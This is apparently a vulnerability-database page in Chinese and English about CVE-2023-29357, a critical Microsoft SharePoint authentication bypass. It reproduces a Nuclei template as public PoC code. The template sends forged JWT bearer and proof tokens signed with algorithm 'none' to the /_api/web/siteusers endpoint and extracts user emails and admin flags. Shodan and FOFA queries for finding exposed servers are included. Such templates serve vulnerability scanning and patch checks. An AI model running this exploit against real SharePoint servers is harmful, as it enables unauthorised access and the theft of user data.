CVE-2023-29357: Microsoft SharePoint - Authentication Bypass

日期: 2025-08-01 | 影响软件: Microsoft SharePoint | POC: 已公开

漏洞描述

Microsoft SharePoint Server Elevation of Privilege Vulnerability

PoC代码[已公开]

id: CVE-2023-29357

info:
  name: Microsoft SharePoint - Authentication Bypass
  author: pdteam
  severity: critical
  description: |
    Microsoft SharePoint Server Elevation of Privilege Vulnerability
  reference:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357
    - https://srcincite.io/advisories/src-2020-0022/
    - https://github.com/Chocapikk/CVE-2023-29357
    - https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/
    - https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-29357
    epss-score: 0.94356
    epss-percentile: 0.99956
    cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: microsoft
    product: sharepoint_server
    shodan-query:
      - http.headers_hash:-1968878704
      - cpe:"cpe:2.3:a:microsoft:sharepoint_server"
    fofa-query:
      - app="Microsoft-SharePoint"
      - app="microsoft-sharepoint"
  tags: cve,cve2023,microsoft,sharepoint_server,kev
variables:
  client_id: "00000003-0000-0ff1-ce00-000000000000"

http:
  - raw:
      - |
        GET /_api/web/siteusers HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer
      - |
        GET /_api/web/siteusers HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
        X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA

    extractors:
      - type: regex
        part: header
        group: 1
        name: realm
        regex:
          - realm="([^"]*)"
        internal: true

      - type: json
        json:
          - .value[].Email
    matchers:
      - type: word
        part: body_2
        words:
          - LoginName
          - Email
          - IsSiteAdmin
        condition: and
# digest: 4a0a00473045022100c3a5fc1baa8266d03d2229ed002bcde6a39a1ee1a3507f16da4d6d8a703d4df30220487c5c935be2f5dd19a20f428ac2aa67056d1d62a7ffafff3d5651c785dc1a61:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-29357.yaml

相关漏洞推荐